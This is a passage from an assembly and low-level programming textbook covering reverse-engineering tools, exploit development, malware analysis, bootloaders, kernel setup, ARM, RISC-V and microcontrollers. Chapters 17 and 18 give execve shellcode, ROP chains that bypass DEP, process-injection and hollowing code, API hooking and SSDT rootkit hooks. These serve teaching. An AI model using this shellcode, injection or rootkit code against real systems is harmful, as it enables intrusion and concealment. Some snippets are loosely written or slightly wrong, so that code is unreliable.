    print(FuncStart(func), GetFunctionName(func))

16.5 Ghidra

NSA's open-source reverse engineering tool:

Java-based GUI
Decompiler
Scripting in Java/Python
Collaborative features

Ghidra Scripts

# Python script in Ghidra
from ghidra.program.model.listing import Function

for func in currentProgram.getListing().getFunctions(True):
    print(func.getName(), hex(func.getEntryPoint().getOffset()))

16.6 Static vs Dynamic Analysis

Static Analysis

Examining code without execution:

Disassembly
Control flow graphs
Data flow analysis
String references
Import/export tables

Tools: IDA, Ghidra, radare2, Binary Ninja

Dynamic Analysis

Running code in controlled environment:

Debugging
Tracing (strace, ltrace)
Memory dumps
API monitoring
Fuzzing

Tools: GDB, WinDbg, x64dbg, OllyDbg

Hybrid Approach

Use static to understand structure
Use dynamic to confirm behavior
Set breakpoints at interesting locations
Trace execution paths

Chapter 17: Exploit Development Basics

17.1 Stack Buffer Overflow

Classic vulnerability: writing beyond buffer bounds.

Vulnerable Code

void vulnerable(char *input) {
    char buffer[64];
    strcpy(buffer, input);  // No bounds check!
}

Stack Layout Before Overflow

High addresses
+------------------+
| Return address   |
+------------------+
| Saved RBP        |
+------------------+
| buffer[63]       |
| ...              |
| buffer[0]        |
+------------------+ <--- RSP
Low addresses

Overflow to Control RIP

; Input crafted to:
; 1. Fill buffer (64 bytes)
; 2. Overwrite saved RBP (8 bytes)
; 3. Overwrite return address with shellcode address

Simple Exploit (32-bit)

# Python exploit template
buffer = "A" * 64          # padding
buffer += "BBBBBBBB"       # saved EBP
buffer += "\x60\xa0\x04\x08" # return to shellcode

# Shellcode (execve /bin/sh)
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\xb0\x0b\xcd\x80"
)

print buffer + shellcode

17.2 Heap Exploitation

Heap-based vulnerabilities are more complex.

Heap Structure

Chunk header:
    prev_size (if previous free)
    size (with flags: PREV_INUSE, IS_MMAPPED)
    fd (forward pointer - if free)
    bk (backward pointer - if free)
User data...

Use-After-Free

char *ptr = malloc(100);
free(ptr);
// ... later
strcpy(ptr, "exploit");  // Use after free!

Double Free

char *ptr = malloc(100);
free(ptr);
free(ptr);  // Double free - corrupts allocator

17.3 Return-Oriented Programming (ROP)

Bypass NX/DEP by reusing existing code.

Gadgets

Small instruction sequences ending in ret:

; Find gadgets in binary
pop rax; ret
pop rdi; ret
syscall; ret
mov [rax], rdx; ret

ROP Chain Example

; execve("/bin/sh", NULL, NULL)
; Gadget addresses:
pop_rdi = 0x400123
pop_rsi = 0x400456
pop_rdx = 0x400789
syscall = 0x400abc
binsh = 0x601000  ; address of "/bin/sh" string

; ROP chain on stack:
pop_rdi
binsh
pop_rsi
0
pop_rdx
0
syscall

17.4 Shellcode Writing

Basic Shellcode (Linux x86-64)

; execve("/bin/sh", NULL, NULL)
section .text
    global _start

_start:
    ; execve syscall number: 59
    push 59
    pop rax
    
    ; "/bin/sh" string
    push 0
    mov rbx, 0x68732f6e69622f  ; "hs/nib/" reversed? Actually:
    ; "/bin/sh" in hex: 0x2f62696e2f7368
    ; For little-endian push: 0x68732f6e69622f
    push rbx
    mov rdi, rsp      ; RDI points to "/bin/sh"
    
    ; argv = {rdi, NULL}
    xor rsi, rsi      ; NULL argv
    push rsi
    push rdi
    mov rsi, rsp      ; RSI points to argv
    
    ; envp = NULL
    xor rdx, rdx
    
    syscall

Null-Free Shellcode

Avoid null bytes that would terminate strings:

; Instead of:
mov eax, 59    ; contains null bytes in 64-bit

; Use:
push 59
pop rax        ; no nulls

; Instead of:
mov rbx, 0x68732f6e69622f  ; may have nulls
; Use:
xor rbx, rbx
mov bl, 0x2f
shl rbx, 8
...

17.5 Bypassing ASLR & DEP

ASLR (Address Space Layout Randomization)

Randomizes memory addresses:

Stack
Heap
Libraries
Executable (PIE)

Bypass Techniques

Information leak: Read memory to find addresses
Partial overwrite: Modify low bytes only
Return to PLT: Use known function addresses
Brute force: 32-bit ASLR can be brute-forced

DEP (Data Execution Prevention)

Marks stack/heap as non-executable.

Bypass with ROP

Use existing code (no shellcode on stack)
Chain gadgets to perform actions
Can call mprotect/VirtualProtect to make memory executable

Example: Call mprotect via ROP

; mprotect(addr, len, PROT_READ|PROT_WRITE|PROT_EXEC)
; Gadgets:
pop_rdi
pop_rsi
pop_rdx
pop_rax
syscall

; ROP chain:
pop_rdi
page_address      ; start of shellcode page
pop_rsi
0x1000            ; length
pop_rdx
7                 ; PROT_READ|PROT_WRITE|PROT_EXEC
pop_rax
10                ; mprotect syscall
syscall
; then jump to shellcode

Chapter 18: Malware Analysis

18.1 Packers & Obfuscation

Packers compress/encrypt the original executable.

Packed Executable Structure

+------------------+
| Packer stub      |
| - decompress     |
| - decrypt        |
| - resolve imports|
| - jump to OEP    |
+------------------+
| Packed original  |
| (compressed/     |
|  encrypted)      |
+------------------+

Detecting Packers

Section names: UPX0, UPX1, .packed, etc.
Entropy analysis
Import table looks suspicious
Small number of imports

Unpacking Techniques

Static unpacking: Use unpacker tools
Dynamic unpacking: Run and dump after unpack
Manual OEP finding: Set breakpoints on memory access

; Find OEP by breaking on:
; - Return from unpacking routine
; - Access to packed code section
; - API calls (after imports resolved)

18.2 Anti-Debug Techniques

IsDebuggerPresent (Windows)

; Check BeingDebugged flag in PEB
mov rax, gs:[60h]    ; PEB
mov al, [rax+2]      ; BeingDebugged flag
test al, al
jnz being_debugged

NtGlobalFlag (Windows)

; Check NtGlobalFlag in PEB
mov rax, gs:[60h]    ; PEB
mov eax, [rax+68h]   ; NtGlobalFlag
; Normal = 0, Debugged = 0x70

Timing Checks

; Check if single-stepping
rdtsc                 ; get timestamp
; ... some code ...
rdtsc
sub eax, old_eax
cmp eax, threshold    ; if too slow, being debugged
ja being_debugged

INT3 Detection

; Check for software breakpoints (0xCC)
mov al, [address]
cmp al, 0xCC
je breakpoint_found

PTRACE (Linux)

; Try to ptrace self - can only have one tracer
mov rax, 101          ; ptrace syscall
xor rdi, rdi          ; PTRACE_TRACEME
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
cmp rax, -1
je being_traced

18.3 API Hooking

IAT Hooking

Modify Import Address Table to redirect API calls:

; Original IAT entry points to MessageBoxA
; After hook: points to our function

hook_function:
    ; Save registers
    push rax
    ; Do malicious stuff
    ; Call original API
    pop rax
    jmp original_MessageBoxA

Inline Hooking

Modify function prologue:

; Original function:
MessageBoxA:
    mov r10, rcx      ; original first instruction
    ; ...

; After hook (5-byte jmp):
MessageBoxA:
    jmp hook_function ; overwrites first 5 bytes
    ; ... (rest of function after overwritten bytes)

Detours Library (Microsoft)

// Hook function with Detours
PBYTE OriginalMessageBox = 
    (PBYTE)DetourFindFunction("user32.dll", "MessageBoxA");

DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalMessageBox, HookedMessageBox);
DetourTransactionCommit();

18.4 Process Injection

DLL Injection

// 1. Open target process
HANDLE hProcess = OpenProcess(
    PROCESS_ALL_ACCESS, FALSE, pid);

// 2. Allocate memory in target
LPVOID pRemoteMemory = VirtualAllocEx(
    hProcess, NULL, sizeof(dllpath),
    MEM_COMMIT, PAGE_READWRITE);

// 3. Write DLL path
WriteProcessMemory(hProcess, pRemoteMemory, 
    dllpath, sizeof(dllpath), NULL);

// 4. Create remote thread to load DLL
HANDLE hThread = CreateRemoteThread(
    hProcess, NULL, 0,
    (LPTHREAD_START_ROUTINE)LoadLibraryA,
    pRemoteMemory, 0, NULL);

Process Hollowing

Create process in suspended state
Unmap original executable
Allocate memory for malicious code
Write malicious code
Set entry point and resume

// Create suspended process
CreateProcess(..., CREATE_SUSPENDED, ...);

// Get thread context
GetThreadContext(hThread, &ctx);

// Unmap original executable
NtUnmapViewOfSection(hProcess, ctx.Rdx);  // 64-bit

// Allocate memory for new executable
VirtualAllocEx(hProcess, imageBase, ...);

// Write new executable
WriteProcessMemory(...);

// Set new entry point
ctx.Rcx = newEntryPoint;
SetThreadContext(hThread, &ctx);

// Resume thread
ResumeThread(hThread);

18.5 Rootkits & Bootkits

Kernel Rootkits

Load as kernel drivers:

Hook system calls (SSDT)
Hook interrupt handlers (IDT)
Filter file system operations
Hide processes/files

SSDT Hooking

// Save original syscall address
origNtOpenProcess = 
    (PVOID)KeServiceDescriptorTable->ServiceTable[0x7A];

// Replace with our function
KeServiceDescriptorTable->ServiceTable[0x7A] = 
    (PVOID)HookNtOpenProcess;

// In hook function
NTSTATUS HookNtOpenProcess(...) {
    // Check if caller is allowed
    if (IsMalicious(ProcessId))
        return STATUS_ACCESS_DENIED;
    
    // Call original
    return origNtOpenProcess(...);
}

Bootkits

Infect boot process:

Master Boot Record (MBR)
Volume Boot Record (VBR)
UEFI firmware

MBR Infection

MBR Layout:
Offset 0x000: Boot code (446 bytes)
Offset 0x1BE: Partition table (64 bytes)
Offset 0x1FE: Signature 0x55AA

Bootkit:
- Replace boot code
- Load before OS
- Remain persistent

UEFI Rootkits

More sophisticated:

Infect UEFI firmware
Run at highest privilege
Survive OS reinstall
Can disable security features

PART VII — Operating System Development

Chapter 19: Bootloaders

19.1 BIOS Boot Process

Boot Sequence

Power-on self-test (POST)
BIOS initializes hardware
BIOS searches for bootable devices
Loads first sector (512 bytes) to 0x7C00
Jumps to 0x7C00

Boot Sector Layout

Offset 0x000 - 0x1BD: Boot code
Offset 0x1BE - 0x1FD: Partition table
Offset 0x1FE - 0x1FF: Signature 0x55AA

Simple Bootloader

; boot.asm - Simple bootloader
[org 0x7C00]
[bits 16]

start:
    ; Set up segments
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0x7C00
    
    ; Print message
    mov si, msg
    call print_string
    
    ; Hang
    jmp $

print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

msg db "Hello from bootloader!", 13, 10, 0

; Pad to 510 bytes
times 510-($-$$) db 0
dw 0xAA55

19.2 UEFI

Unified Extensible Firmware Interface.

UEFI Applications

// uefi_main.c
#include <efi.h>
#include <efilib.h>

EFI_STATUS
EFIAPI
efi_main(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
    InitializeLib(ImageHandle, SystemTable);
    
    Print(L"Hello from UEFI!\n");
    
    return EFI_SUCCESS;
}

UEFI Boot Services

Memory allocation
Protocol handlers
Image loading
Event handling

UEFI Runtime Services

Variable services
Time services
Reset services

19.3 Writing a Bootloader

Stage 1: Load Second Stage

; Load more sectors
load_second_stage:
    mov ah, 0x02        ; read sectors
    mov al, 0x10        ; sectors to read
    mov ch, 0           ; cylinder
    mov cl, 2           ; sector (1-based)
    mov dh, 0           ; head
    mov dl, [boot_drive]; drive
    mov bx, 0x1000      ; buffer
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Jump to second stage
    jmp 0x1000:0x0000

Entering Protected Mode

; Enable A20 line
enable_a20:
    in al, 0x92
    or al, 2
    out 0x92, al
    ret

; Load GDT
load_gdt:
    lgdt [gdt_desc]
    
    ; Switch to protected mode
    mov eax, cr0
    or eax, 1
    mov cr0, eax
    
    ; Far jump to flush pipeline
    jmp 0x08:protected_mode

[bits 32]
protected_mode:
    mov ax, 0x10        ; data segment
    mov ds, ax
    mov es, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax
    mov esp, 0x90000

19.4 Protected Mode Switching

GDT for Protected Mode

gdt_start:
    ; Null descriptor
    dq 0
    
    ; Code segment
    dw 0xFFFF           ; limit 0-15
    dw 0                ; base 0-15
    db 0                ; base 16-23
    db 0x9A             ; present, ring0, code, readable
    db 0xCF             ; 4KB granularity, 32-bit, limit 16-19
    db 0                ; base 24-31
    
    ; Data segment
    dw 0xFFFF
    dw 0
    db 0
    db 0x92             ; present, ring0, data, writable
    db 0xCF
    db 0
gdt_end:

gdt_desc:
    dw gdt_end - gdt_start - 1
    dd gdt_start

19.5 Long Mode Activation

Switching to 64-bit Long Mode

; Check for long mode support
check_long_mode:
    mov eax, 0x80000000
    cpuid
    cmp eax, 0x80000001
    jb no_long_mode
    
    mov eax, 0x80000001
    cpuid
    test edx, 1 << 29   ; LM bit
    jz no_long_mode
    ret

; Set up paging
setup_paging:
    ; Clear page tables
    mov edi, 0x1000
    mov cr3, edi
    xor eax, eax
    mov ecx, 4096
    rep stosd
    
    ; Set up PML4
    mov edi, cr3
    mov dword [edi], 0x2003      ; PDPT at 0x2000, present/write
    
    ; Set up PDPT
    mov edi, 0x2000
    mov dword [edi], 0x3003      ; PD at 0x3000, present/write
    
    ; Set up PD
    mov edi, 0x3000
    mov dword [edi], 0x4003      ; PT at 0x4000, present/write
    
    ; Set up PT (identity map first 2MB)
    mov edi, 0x4000
    mov eax, 3                    ; present/write
    mov ecx, 512
.map_2mb:
    mov [edi], eax
    add eax, 0x1000
    add edi, 8
    loop .map_2mb
    ret

; Enable long mode
enable_long_mode:
    ; Enable PAE
    mov eax, cr4
    or eax, 1 << 5
    mov cr4, eax
    
    ; Set EFER.LME
    mov ecx, 0xC0000080
    rdmsr
    or eax, 1 << 8
    wrmsr
    
    ; Enable paging
    mov eax, cr0
    or eax, 1 << 31
    mov cr0, eax
    ret

Chapter 20: Kernel Development

20.1 Interrupt Descriptor Table

IDT Setup in Long Mode

; Set up IDT entry
; RDI = index, RSI = handler, RDX = type
setup_idt_entry:
    push rbp
    mov rbp, rsp
    
    ; Calculate offset
    shl rdi, 4          ; each entry 16 bytes
    add rdi, idt_base
    
    ; Set low offset
    mov [rdi], si
    shr rsi, 16
    mov [rdi+2], si     ; segment selector (assume 0x08)
    mov word [rdi+4], 0 ; IST (unused)
    
    ; Set type
    mov byte [rdi+5], 0x8E  ; present, ring0, interrupt gate
    
    ; Set high offset
    shr rsi, 16
    mov [rdi+6], si
    shr rsi, 16
    mov [rdi+8], si
    mov dword [rdi+12], 0
    
    pop rbp
    ret

Interrupt Handler Template

; Common interrupt handler stub
interrupt_handler:
    ; Save all registers
    push rax
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15
    
    ; Call C handler
    mov rdi, [rsp+120]   ; interrupt number
    mov rsi, rsp          ; register frame
    call c_handler
    
    ; Restore registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    pop rax
    
    iretq

20.2 Global Descriptor Table

GDT for Long Mode

; Long mode GDT
gdt64:
    dq 0                    ; null descriptor
    dq 0x0020980000000000   ; 64-bit code segment
    dq 0x0000920000000000   ; 64-bit data segment

gdt64_desc:
    dw $ - gdt64 - 1
    dq gdt64

Task State Segment (TSS)

; TSS structure
struc tss
    .reserved1 resd 1
    .rsp0      resq 1      ; stack for ring 0
    .rsp1      resq 1      ; stack for ring 1
    .rsp2      resq 1      ; stack for ring 2
    .reserved2 resd 1
    .ist1      resq 1      ; interrupt stack table
    .ist2      resq 1
    .ist3      resq 1
    .ist4      resq 1
    .ist5      resq 1
    .ist6      resq 1
    .ist7      resq 1
    .reserved3 resd 1
    .iomap     resw 1      ; I/O map base
endstruc

; Load TSS
load_tss:
    mov ax, 0x28           ; TSS segment selector
    ltr ax
    ret

20.3 Paging Setup

Identity Mapping

; Identity map first 4GB
identity_map:
    ; PML4 entry points to PDPT
    mov rax, 0x2000
    or rax, 3              ; present, writable
    mov [0x1000], rax
    
    ; PDPT entry points to PD
    mov rax, 0x3000
    or rax, 3
    mov [0x2000], rax
    
    ; PD entries (512 * 2MB = 1GB)
    mov rdi, 0x3000
    mov rax, 0x83          ; present, writable, huge page
    mov rcx, 512
.map_pd:
    mov [rdi], rax
    add rax, 0x200000      ; next 2MB
    add rdi, 8
    loop .map_pd
    ret

Page Fault Handler

page_fault_handler:
    ; Get faulting address from CR2
    mov rax, cr2
    
    ; Check if address is valid
    ; (simplified - just allocate page)
    
    ; Allocate physical page
    call alloc_page
    
    ; Map page at faulting address
    mov rdi, rax          ; virtual address
    mov rsi, rax          ; physical address (identity mapping)
    call map_page
    
    ; Return from fault (instruction will be retried)
    iretq

20.4 Task Switching

Software Task Switching

; Save current task context
save_context:
    ; Save registers to TSS or task structure
    mov [task_struct + Task.rax], rax
    mov [task_struct + Task.rbx], rbx
    ; ... save others
    
    ; Save stack pointer
    mov [task_struct + Task.rsp], rsp
    
    ; Save instruction pointer from return address
    mov rax, [rsp]
    mov [task_struct + Task.rip], rax
    ret

; Switch to next task
switch_task:
    ; Save current
    call save_context
    
    ; Select next task (simplified round-robin)
    mov rax, [current_task]
    inc rax
    cmp rax, [task_count]
    jl .set_current
    xor rax, rax
.set_current:
    mov [current_task], rax
    
    ; Load new task
    mov rbx, [task_list + rax*8]
    
    ; Restore stack
    mov rsp, [rbx + Task.rsp]
    
    ; Restore other registers
    mov rax, [rbx + Task.rax]
    mov rbx, [rbx + Task.rbx]
    ; ... restore others
    
    ; Jump to saved instruction pointer
    ret

20.5 Writing Device Drivers

PCI Configuration

; Read PCI config space
; EDI = bus:device:function, ESI = offset
pci_read_config:
    mov eax, 0x80000000
    or eax, edi          ; bus:device:function
    or eax, esi          ; offset
    mov dx, 0xCF8
    out dx, eax
    
    mov dx, 0xCFC
    in eax, dx
    ret

; Write PCI config space
pci_write_config:
    push rax
    mov eax, 0x80000000
    or eax, edi
    or eax, esi
    mov dx, 0xCF8
    out dx, eax
    
    pop rax
    mov dx, 0xCFC
    out dx, eax
    ret

Simple UART Driver

; COM1 base address
COM1 equ 0x3F8

; Initialize UART
uart_init:
    ; Set baud rate divisor
    mov dx, COM1 + 3      ; line control register
    mov al, 0x80          ; enable DLAB
    out dx, al
    
    mov dx, COM1          ; divisor low
    mov al, 1             ; 115200 baud
    out dx, al
    
    mov dx, COM1 + 1      ; divisor high
    xor al, al
    out dx, al
    
    ; Set line parameters
    mov dx, COM1 + 3
    mov al, 3             ; 8 bits, no parity, 1 stop
    out dx, al
    
    ; Enable FIFO
    mov dx, COM1 + 2
    mov al, 0xC7
    out dx, al
    ret

; Send character
uart_putc:
    push rax
    mov dx, COM1 + 5      ; line status
.wait:
    in al, dx
    test al, 0x20         ; transmitter holding register empty?
    jz .wait
    
    pop rax
    mov dx, COM1
    out dx, al
    ret

PART VIII — Advanced Architectures

Chapter 21: ARM Assembly

21.1 ARM vs x86

Key Differences

Feature	ARM	x86
Instruction set	RISC	CISC
Registers	16-32 general purpose	8-16 general purpose
Instruction length	Fixed (32/16-bit)	Variable
Addressing	Load-store	Memory operands
Conditionals	Conditional execution	Conditional jumps
Endianness	Bi-endian	Little-endian

21.2 ARM Registers

ARM32 (AArch32)

R0-R3:   Argument/scratch registers
R4-R11:  Callee-saved registers
R12:     IP (intra-procedure scratch)
R13:     SP (stack pointer)
R14:     LR (link register)
R15:     PC (program counter)

CPSR:    Current Program Status Register
    N: Negative flag
    Z: Zero flag
    C: Carry flag
    V: Overflow flag
    I: IRQ disable
    F: FIQ disable
    T: Thumb state
    M: Mode bits

ARM64 (AArch64)

X0-X7:   Argument/result registers
X8:      Indirect result location register
X9-X15:  Temporary registers
X16-X17: Intra-procedure scratch
X18:     Platform register
X19-X28: Callee-saved
X29:     FP (frame pointer)
X30:     LR (link register)
SP:      Stack pointer
PC:      Program counter

NZCV:    Condition flags (in PSTATE)

21.3 ARM Instruction Set

Data Processing Instructions

; Arithmetic
ADD R0, R1, R2      ; R0 = R1 + R2
SUB R0, R1, R2      ; R0 = R1 - R2
RSB R0, R1, R2      ; R0 = R2 - R1 (reverse subtract)

; Logical
AND R0, R1, R2      ; R0 = R1 & R2
ORR R0, R1, R2      ; R0 = R1 | R2
EOR R0, R1, R2      ; R0 = R1 ^ R2
BIC R0, R1, R2      ; R0 = R1 & ~R2

; Move
MOV R0, #42         ; R0 = 42
MVN R0, R1          ; R0 = ~R1

; Compare (set flags only)
CMP R0, R1          ; set flags based on R0 - R1
CMN R0, R1          ; set flags based on R0 + R1
TST R0, R1          ; set flags based on R0 & R1
TEQ R0, R1          ; set flags based on R0 ^ R1

Load/Store Instructions

; Single register
LDR R0, [R1]        ; R0 = *R1
STR R0, [R1]        ; *R1 = R0

; With offset
LDR R0, [R1, #4]    ; R0 = *(R1 + 4)
LDR R0, [R1, R2]    ; R0 = *(R1 + R2)
LDR R0, [R1, R2, LSL #2] ; R0 = *(R1 + (R2<<2))

; Pre-indexed
LDR R0, [R1, #4]!   ; R1 += 4, then R0 = *R1

; Post-indexed
LDR R0, [R1], #4    ; R0 = *R1, then R1 += 4

; Multiple registers
LDMIA R0!, {R1-R4}  ; Load multiple, increment after
STMDB R0!, {R1-R4}  ; Store multiple, decrement before

Branch Instructions

B label             ; unconditional branch
BL label            ; branch and link (call)
BX R0               ; branch and exchange to register
BLX R0              ; branch with link and exchange

; Conditional branches
BEQ label           ; branch if equal (Z=1)
BNE label           ; branch if not equal (Z=0)
BGT label           ; branch if greater than (signed)
BLT label           ; branch if less than (signed)

21.4 Thumb Mode

16-bit compressed instruction set.

Thumb vs ARM

; ARM mode (32-bit)
ADD R0, R1, R2      ; 4 bytes

; Thumb mode (16-bit)
ADD R0, R1          ; R0 += R1 (2 bytes)

Thumb-2

Mixed 16/32-bit instructions:

IT EQ               ; If-Then (next 1-4 instructions conditional)
ADD R0, R1          ; executed if EQ
ADD R2, R3          ; not part of IT block

21.5 ARM64

AArch64 Instructions

; Data processing
ADD X0, X1, X2      ; X0 = X1 + X2
SUB X0, X1, X2      ; X0 = X1 - X2
AND X0, X1, X2      ; X0 = X1 & X2

; Load/store
LDR X0, [X1]        ; X0 = *X1
STR X0, [X1]        ; *X1 = X0
LDP X0, X1, [X2]    ; load pair

; Branches
B label             ; unconditional
BL label            ; branch with link
RET                 ; return from function

Function Call Example

; int add(int a, int b) { return a + b; }
add:
    ADD W0, W0, W1   ; W0 = W0 + W1 (32-bit)
    RET

; int main() { return add(5, 3); }
main:
    MOV W0, #5       ; first argument
    MOV W1, #3       ; second argument
    BL add           ; call add
    RET              ; return

Chapter 22: RISC-V Assembly

22.1 RISC-V Architecture

Design Philosophy

Clean-slate design
Open ISA
Modular extensions
Suitable for all implementations

Base Integer ISA (RV32I/RV64I)

32-bit (RV32I) or 64-bit (RV64I)
32 registers (x0-x31)
Simple load-store architecture
Few instruction formats

22.2 Instruction Formats

R-Type (Register-Register)

funct7 | rs2 | rs1 | funct3 | rd | opcode
 7 bits |5 bits|5 bits|3 bits|5 bits|7 bits

Example: ADD x1, x2, x3

I-Type (Immediate)

immediate[11:0] | rs1 | funct3 | rd | opcode
   12 bits      |5 bits|3 bits|5 bits|7 bits

Example: ADDI x1, x2, 100

S-Type (Store)

imm[11:5] | rs2 | rs1 | funct3 | imm[4:0] | opcode
  7 bits  |5 bits|5 bits|3 bits| 5 bits   |7 bits

Example: SW x1, 100(x2)

B-Type (Branch)

imm[12,10:5] | rs2 | rs1 | funct3 | imm[4:1,11] | opcode
    7 bits   |5 bits|5 bits|3 bits|   5 bits    |7 bits

Example: BEQ x1, x2, label

U-Type (Upper Immediate)

immediate[31:12] | rd | opcode
    20 bits      |5 bits|7 bits

Example: LUI x1, 0x12345

J-Type (Jump)

immediate[20,10:1,11,19:12] | rd | opcode
         20 bits            |5 bits|7 bits

Example: JAL x1, label

22.3 CSR Registers

Control and Status Registers.

Common CSRs

mstatus: Machine status
mtvec:   Machine trap handler base
mepc:    Machine exception PC
mcause:  Machine exception cause
mtval:   Machine trap value
mip:     Machine interrupt pending
mie:     Machine interrupt enable

CSR Instructions

CSRRW rd, csr, rs1   ; atomic read/write
CSRRS rd, csr, rs1   ; atomic read/set bits
CSRRC rd, csr, rs1   ; atomic read/clear bits
CSRRWI rd, csr, imm  ; read/write immediate
CSRRSI rd, csr, imm  ; read/set immediate
CSRRCI rd, csr, imm  ; read/clear immediate

22.4 Embedded RISC-V

RV32E for Embedded

16 registers (x0-x15)
Reduced area
Same ISA otherwise

Example: Blink LED

# GPIO base address
.equ GPIO_BASE, 0x10012000
.equ GPIO_OUT, 0x00
.equ GPIO_DIR, 0x04

.section .text
.globl _start

_start:
    # Set up stack
    la sp, _stack_top
    
    # Configure GPIO
    li t0, GPIO_BASE
    
    # Set pin 5 as output
    li t1, (1 << 5)
    sw t1, GPIO_DIR(t0)
    
loop:
    # Turn LED on
    sw t1, GPIO_OUT(t0)
    
    # Delay
    li a0, 100000
    call delay
    
    # Turn LED off
    sw zero, GPIO_OUT(t0)
    
    # Delay
    li a0, 100000
    call delay
    
    j loop

delay:
    li t0, 0
1:
    addi t0, t0, 1
    blt t0, a0, 1b
    ret

PART IX — Embedded Systems & Hardware Programming

Chapter 23: Microcontrollers

23.1 AVR Assembly

AVR Architecture

8-bit RISC
32 8-bit registers (R0-R31)
Some registers have special functions:
- R26-R27: X pointer
- R28-R29: Y pointer
- R30-R31: Z pointer

Basic Instructions

; Data transfer
LDI R16, 0xFF       ; load immediate
MOV R0, R1          ; copy register
LD R0, X            ; load indirect
ST X, R0            ; store indirect

; Arithmetic
ADD R0, R1          ; add
SUB R0, R1          ; subtract
INC R0              ; increment
DEC R0              ; decrement

; Logic
AND R0, R1          ; and
OR R0, R1           ; or
EOR R0, R1          ; xor
COM R0              ; complement

; Branch
RJMP label          ; relative jump
RCALL label         ; relative call
RET                 ; return
BRNE label          ; branch if not equal

Example: Blink LED

; ATmega328P (Arduino Uno)

.equ DDRB, 0x04
.equ PORTB, 0x05

.org 0
    rjmp main

main:
    ; Set pin 5 as output
    ldi r16, (1 << 5)
    out DDRB, r16
    
loop:
    ; Turn LED on
    sbi PORTB, 5
    
    ; Delay
    ldi r18, 100
    call delay
    
    ; Turn LED off
    cbi PORTB, 5
    
    ; Delay
    ldi r18, 100
    call delay
    
    rjmp loop

delay:
    ldi r16, 255
1:  ldi r17, 255
2:  dec r17
    brne 2b
    dec r16
    brne 1b
    dec r18
    brne delay
    ret

23.2 STM32

ARM Cortex-M microcontrollers.

STM32F4 Example

; STM32F4 Discovery - Blink LED
.syntax unified
.cpu cortex-m4
.thumb

.equ RCC_AHB1ENR, 0x40023830
.equ GPIOD_MODER, 0x40020C00
.equ GPIOD_ODR,   0x40020C14

.section .text
.global _start

_start:
    ; Enable GPIOD clock
    ldr r0, =RCC_AHB1ENR
    ldr r1, [r0]
    orr r1, r1, #(1 << 3)  ; bit 3 for GPIOD
    str r1, [r0]
    
    ; Configure PD12 as output
    ldr r0, =GPIOD_MODER
    ldr r1, [r0]
    bic r1, r1, #(3 << 24) ; clear bits 24-25 (PD12)
    orr r1, r1, #(1 << 24) ; set to output (01)
    str r1, [r0]
    
loop:
    ; LED on
    ldr r0, =GPIOD_ODR
    ldr r1, [r0]
    orr r1, r1, #(1 << 12) ; set PD12 high
    str r1, [r0]
    
    ; Delay
    ldr r2, =1000000
1:  subs r2, r2, #1
    bne 1b
    
    ; LED off
    ldr r0, =GPIOD_ODR
    ldr r1, [r0]
    bic r1, r1, #(1 << 12) ; set PD12 low
    str r1, [r0]
    
    ; Delay
    ldr r2, =1000000
2:  subs r2, r2, #1
    bne 2b
    
    b loop

.section .stack
.space 1024
_stack_top:

23.3 Memory-Mapped I/O

Peripherals controlled via memory addresses.

GPIO Registers

; Typical GPIO register layout
struc gpio_regs
    .moder   resd 1   ; mode register
    .otyper  resd 1   ; output type
    .ospeedr resd 1   ; output speed
    .pupdr   resd 1   ; pull-up/down
    .idr     resd 1   ; input data
    .odr     resd 1   ; output data
    .bsrr    resd 1   ; bit set/reset
    .lckr    resd 1   ; lock
    .afrl    resd 1   ; alternate function low
    .afrh    resd 1   ; alternate function high
endstruc

; Set pin as output
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))  ; clear mode bits
or eax, (1 << (pin*2))    ; set to output
mov [gpio_base + gpio_regs.moder], eax

; Write to pin
mov eax, 1 << pin
mov [gpio_base + gpio_regs.bsrr], eax  ; set
mov [gpio_base + gpio_regs.bsrr], eax << 16  ; reset

23.4 GPIO Programming

Input Configuration

; Configure pin as input with pull-up
; Clear mode bits (00 = input)
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))
mov [gpio_base + gpio_regs.moder], eax

; Configure pull-up
mov eax, [gpio_base + gpio_regs.pupdr]
and eax, ~(3 << (pin*2))
or eax, (1 << (pin*2))     ; 01 = pull-up
mov [gpio_base + gpio_regs.pupdr], eax

; Read input
mov eax, [gpio_base + gpio_regs.idr]
shr eax, pin
and eax, 1                  ; get pin value

Interrupt on Pin Change

; Enable EXTI interrupt on pin
; Configure SYSCFG to route GPIO to EXTI
mov eax, [SYSCFG_EXTICR + (pin/4)*4]
and eax, ~(0xF << ((pin%4)*4))
or eax, (port << ((pin%4)*4))
mov [SYSCFG_EXTICR + (pin/4)*4], eax

; Configure EXTI
mov eax, 1 << pin
mov [EXTI_IMR], eax         ; unmask interrupt
mov [EXTI_RTSR], eax        ; rising edge trigger

; Set interrupt priority
mov byte [NVIC_IPR(EXTI_IRQn)], 0

; Enable interrupt in NVIC
mov eax, 1 << EXTI_IRQn
mov [NVIC_ISER], eax

23.5 Interrupt Controllers

NVIC (Nested Vectored Interrupt Controller)

; Set interrupt priority
; NVIC_IPR[n] = priority (4 bits per interrupt)
mov r0, #EXTI0_IRQn
lsr r1, r0, #2       ; which IPR register
lsl r0, r0, #3       ; offset in register (8 bits per interrupt)
and r0, r0, #0x1F    ; bit position

mov r2, #0x80        ; priority (128)
lsl r2, r2, r0
ldr r3, =NVIC_IPR_BASE
str r2, [r3, r1, lsl #2]

; Enable interrupt
mov r0, #EXTI0_IRQn
lsr r1, r0, #5       ; which ISER register
lsl r0, r0, #0x1F    ; bit in register
mov r2, #1
